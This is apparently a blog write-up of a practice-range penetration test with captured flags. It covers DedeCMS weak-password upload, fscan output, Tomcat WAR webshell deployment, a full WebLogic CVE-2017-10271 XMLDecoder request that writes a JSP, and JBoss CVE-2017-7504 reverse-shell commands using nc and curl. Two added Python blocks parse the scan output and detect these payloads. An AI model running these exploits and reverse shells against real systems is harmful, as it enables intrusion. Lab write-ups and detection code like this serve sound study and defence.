A simple practice-range penetration test

Hint: 12 flags in total, and there is an internal network.
Passing standard: 5 flags.
Range address: http://1.14.65.168:8077/m/index.php
Just finished the New Year holiday, so let's have a go.

[TOC]

Flags obtained:
1.14.65.168
flag{dc53e209ffa7f1cd8c7ebdc2eeff34a7}
flag1 : flag{f784234649d7ef161229349d1d76ba8d}

172.16.20.38 tomcat
flag3 : flag{03bbcaf39bdd08fa8d0d9e5477e102c5}

172.16.20.66
flag5 : flag{b717ca3e4543f05e6970ede833d68ba4}

172.16.20.76
flag4 : flag{22fceae28669c34d139f7ff6db690acb}

172.16.20.135
flag9 : flag{27e6221a8a55c8ee7396e74531dc7d9d}

Information gathering

Powered by DedeCMSV57_UTF8_SP1

http://1.14.65.168:8077/data/admin/ver.txt gives the version date 20170303

File upload

http://1.14.65.168:8077/dede/ admin/admin weak backend password

Arbitrary file upload from the backend

Connected with Godzilla; judging from this, privilege escalation will be needed.

Under the html directory: the first flag{dc53e209ffa7f1cd8c7ebdc2eeff34a7}. Alternatively, robots.txt gives the path directly.

Under the root directory: the second flag{f784234649d7ef161229349d1d76ba8d}

This host is 172.16.20.66

Scanning other hosts on the internal network

Found a certain master's fscan (shadow1ng/fscan: an all-in-one internal-network scanner for convenient one-click, comprehensive vulnerability scanning (github.com)), exactly what's needed to scan the 172.16.20.* segment for live hosts

Found 5 other live hosts

(icmp) Target '172.16.20.38' is alive
(icmp) Target '172.16.20.62' is alive
(icmp) Target '172.16.20.66' is alive
(icmp) Target '172.16.20.76' is alive
(icmp) Target '172.16.20.135' is alive
icmp alive hosts len is: 5
172.16.20.38:8009 open
172.16.20.135:8009 open
172.16.20.66:1080 open
172.16.20.135:8080 open
172.16.20.76:8080 open
172.16.20.38:8080 open
172.16.20.62:7001 open
172.16.20.66:80 open
172.16.20.135:8093 open
172.16.20.135:8083 open
alive ports len is: 10
start vulscan
[*] WebTitle:http://172.16.20.62:7001 code:404 len:1164 title:Error 404--Not Found
[+] InfoScan:http://172.16.20.62:7001 [weblogic]
[*] WebTitle:http://172.16.20.76:8080 code:302 len:0 title:None
[*] WebTitle:http://172.16.20.135:8083 code:400 len:0 title:None
[*] WebTitle:http://172.16.20.76:8080/login;jsessionid=0DDFC6D0809CA87D818E92B67A8CFC33 code:200 len:10 title:Login Page
[*] WebTitle:http://172.16.20.38:8080 code:200 len:20 title:Apache Tomcat/8.0.43
[*] WebTitle:http://172.16.20.135:8080 code:200 len:1507 title:Welcome to JBoss™
[*] WebTitle:http://172.16.20.66 code:200 len:12 title:我的网站
[+] InfoScan:http://172.16.20.76:8080/login;jsessionid=0DDFC6D0809CA87D818E92B67A8CFC33 [Shiro]
[+] http://172.16.20.62:7001 poc-yaml-weblogic-cve-2020-14750
[+] http://172.16.20.62:7001 poc-yaml-weblogic-cve-2017-10271
[+] http://172.16.20.62:7001 poc-yaml-weblogic-ssrf
[+] InfoScan:http://172.16.20.135:8080 [Jboss JBOSS]
[+] http://172.16.20.38:8080/manager/html tomcat tomcat
[+] http://172.16.20.38:8080 poc-yaml-tomcat-manager-week
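As an added example, not code from the original post or from the fscan project, this Python snippet parses fscan output lines of the shape shown above into a per-host inventory and orders the hosts for remediation, with weak credentials and PoC hits first, which is how a defender would triage such a scan of their own segment. The regular expressions are my reading of the quoted output, not fscan's documented format, and the sample is constructed from a subset of the lines above.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the fscan output lines quoted above.
SAMPLE = """\
172.16.20.38:8080 open
172.16.20.62:7001 open
[*] WebTitle:http://172.16.20.38:8080 code:200 len:20 title:Apache Tomcat/8.0.43
[+] InfoScan:http://172.16.20.62:7001 [weblogic]
[+] InfoScan:http://172.16.20.135:8080 [Jboss JBOSS]
[+] http://172.16.20.62:7001 poc-yaml-weblogic-cve-2017-10271
[+] http://172.16.20.38:8080/manager/html tomcat tomcat
[+] http://172.16.20.38:8080 poc-yaml-tomcat-manager-week
"""
# Line patterns assumed from the output shown above (my reading of it, not fscan's spec).
PORT_RE = re.compile(r"^([\d.]+):(\d+) open$")
TITLE_RE = re.compile(r"^\[\*\] WebTitle:(\S+) code:\d+ len:\d+ title:(.*)$")
INFO_RE = re.compile(r"^\[\+\] InfoScan:(\S+) \[(.+)\]$")
POC_RE = re.compile(r"^\[\+\] (\S+) (poc-yaml-\S+)$")
CRED_RE = re.compile(r"^\[\+\] (\S+) (\S+) (\S+)$")  # url user password, e.g. tomcat/tomcat

def host_of(url):
    """Strip scheme, port and path from a URL, leaving only the host address."""
    return re.sub(r"^https?://", "", url).split("/")[0].split(":")[0]

def parse_fscan(text):
    """Group every finding by host: open ports, fingerprints, PoC hits, weak credentials."""
    hosts = defaultdict(lambda: {"ports": set(), "fingerprints": set(), "pocs": set(), "creds": set()})
    for line in text.splitlines():
        if m := PORT_RE.match(line):
            hosts[m.group(1)]["ports"].add(int(m.group(2)))
        elif m := TITLE_RE.match(line):
            hosts[host_of(m.group(1))]["fingerprints"].add(m.group(2))
        elif m := INFO_RE.match(line):
            hosts[host_of(m.group(1))]["fingerprints"].add(m.group(2))
        elif m := POC_RE.match(line):
            hosts[host_of(m.group(1))]["pocs"].add(m.group(2))
        elif m := CRED_RE.match(line):
            hosts[host_of(m.group(1))]["creds"].add((m.group(2), m.group(3)))
    return dict(hosts)

RANK = {"high": 0, "medium": 1, "low": 2}

def triage(hosts):
    """Order hosts for remediation: weak creds or PoC hits first, then fingerprinted services."""
    out = []
    for ip, h in hosts.items():
        sev = "high" if h["creds"] or h["pocs"] else "medium" if h["fingerprints"] else "low"
        out.append((ip, sev))
    return sorted(out, key=lambda t: (RANK[t[1]], t[0]))
```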

Setting up a proxy

Two problems came up with the frp proxy:

1. My frpc would not run at all, so I downloaded it again.

2. This error was caused by comments in frpc.ini that had not been removed.

Finally the proxy works.

Now let's go through the sites one by one.

172.16.20.38 tomcat

http://172.16.20.38:8080/manager/html

Log in with tomcat/tomcat and enter the manager.

Tomcat manager: deploy a WAR containing a webshell to get a shell. Generate shel.jsp with Godzilla, then jar -cvf sh.war shel.jsp

http://172.16.20.38:8080/sh/shel.jsp

Got flag3 : flag{03bbcaf39bdd08fa8d0d9e5477e102c5}

Root privileges. The host has two NICs: inet 10.2.5.20/20 brd 10.2.15.255 scope global eth1, i.e. another segment, 10.2.5.*

172.16.20.62 weblogic

fscan identified http://172.16.20.62:7001 as weblogic

[+] http://172.16.20.62:7001 poc-yaml-weblogic-cve-2020-14750
[+] http://172.16.20.62:7001 poc-yaml-weblogic-cve-2017-10271
[+] http://172.16.20.62:7001 poc-yaml-weblogic-ssrf

Being able to reach http://172.16.20.62:7001/wls-wsat/CoordinatorPortType11 suggests CVE-2017-10271 may be present

I was wondering why the exploit wouldn't work... turns out Burp wasn't going through the proxy.

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 172.16.20.62:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 3282

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.6.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/1.jsp</string><void method="println">
<string>
<![CDATA[<% out.print("test"); %>]]></string></void><void method="close"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>



Replace <% out.print("test"); %> with the corresponding JSP webshell

http://172.16.20.62:7001/wls-wsat/1.jsp

Connect with Godzilla

Root user, no other network segments

flag5 : flag{b717ca3e4543f05e6970ede833d68ba4}

172.16.20.76 Shiro

[*] WebTitle:http://172.16.20.76:8080/login;jsessionid=0DDFC6D0809CA87D818E92B67A8CFC33 code:200 len:10 title:Login Page

Confirmed as Shiro

Used the tool https://github.com/j1anFen/shiro_attack/releases

172.16.20.135 JBoss

Confirmed the version is affected by CVE-2017-7504, the JBoss 4.x JBossMQ JMS deserialization vulnerability (write-up on wiki.96.mk: https://wiki.96.mk/Web安全/Jboss/反序列化漏洞/(CVE-2017-7504)JBoss 4.x JBossMQ JMS 反序列化漏洞/)

sudo git clone https://github.com/ianxtianxt/CVE-2015-7501.git

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.1.192:4444   # the IP is the attacking machine's address, 4444 is the port to listen on

nc -lvnp 4444
curl http://172.16.20.135:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser
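As an added example, not code from the original post or from any of the tools it uses, the Python below shows the detection side of the two exploitation patterns used above (the WebLogic wls-wsat XMLDecoder request and the JBossMQ HTTPServerILServlet post): it splits a raw HTTP request and raises an alert when either pattern is present, which is what a WAF rule or log-review script on the server side would look for. The sample requests are constructed here from the traffic shapes shown above, and the function names split_request, weblogic_xmldecoder_alert, jboss_serialized_alert and inspect are my own.

```python
import xml.etree.ElementTree as ET

WORKAREA_NS = "http://bea.com/2004/06/soap/workarea/"
JAVA_SER_MAGIC = b"\xac\xed\x00\x05"  # header of every Java serialization stream
# Constructed samples: the SOAP body mirrors the wls-wsat request shown earlier; the JBoss
# body is a truncated stand-in for a serialized object (only the leading magic matters here).
WLS_REQ = (
    b"POST /wls-wsat/CoordinatorPortType HTTP/1.1\r\nHost: 172.16.20.62:7001\r\n"
    b"Content-Type: text/xml\r\n\r\n"
    b'<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    b'<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
    b'<java version="1.6.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter">'
    b'<string>1.jsp</string><void method="println"><string><![CDATA[<% out.print("test"); %>]]>'
    b'</string></void><void method="close"/></object></java></work:WorkContext>'
    b"</soapenv:Header><soapenv:Body/></soapenv:Envelope>"
)
JBOSS_REQ = (
    b"POST /jbossmq-httpil/HTTPServerILServlet HTTP/1.1\r\nHost: 172.16.20.135:8080\r\n"
    b"Content-Type: application/octet-stream\r\n\r\n" + JAVA_SER_MAGIC + b"\x73\x72\x00"
)

def split_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {k.strip().lower(): v.strip() for k, _, v in (l.partition(":") for l in lines[1:])}
    return method, path, headers, body

def weblogic_xmldecoder_alert(path, headers, body):
    """Flag SOAP posts to wls-wsat whose WorkContext header carries an XMLDecoder payload."""
    if not path.startswith("/wls-wsat/") or "xml" not in headers.get("content-type", ""):
        return None
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    for ctx in root.iter(f"{{{WORKAREA_NS}}}WorkContext"):
        if any(el.tag == "java" and el.get("class") == "java.beans.XMLDecoder" for el in ctx.iter()):
            return "WebLogic wls-wsat XMLDecoder payload (CVE-2017-10271 pattern)"
    return None

def jboss_serialized_alert(path, headers, body):
    """Flag a raw Java serialized stream posted to the JBossMQ HTTP invocation-layer servlet."""
    if "/jbossmq-httpil/HTTPServerILServlet" in path and body.startswith(JAVA_SER_MAGIC):
        return "JBossMQ HTTPServerILServlet received a Java serialized stream (CVE-2017-7504 pattern)"
    return None

def inspect(raw):
    """Return the alerts raised for one raw request; an empty list means nothing matched."""
    method, path, headers, body = split_request(raw)
    if method != "POST":
        return []
    checks = (weblogic_xmldecoder_alert, jboss_serialized_alert)
    return [a for a in (f(path, headers, body) for f in checks) if a]
```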

Root privileges

inet 10.2.5.62/20 brd 10.2.15.255 scope global eth1: found the 10.2.5.* segment

Can't push any further; the second- and third-layer internal network will be covered in a later update. Honestly it all comes down to proxying plus reproducing known vulnerabilities.

Takeaways: first, tooling matters; second, I'm still not very quick at spotting vulnerabilities.

  • Copyrights © 2020-2023 Shmily-ing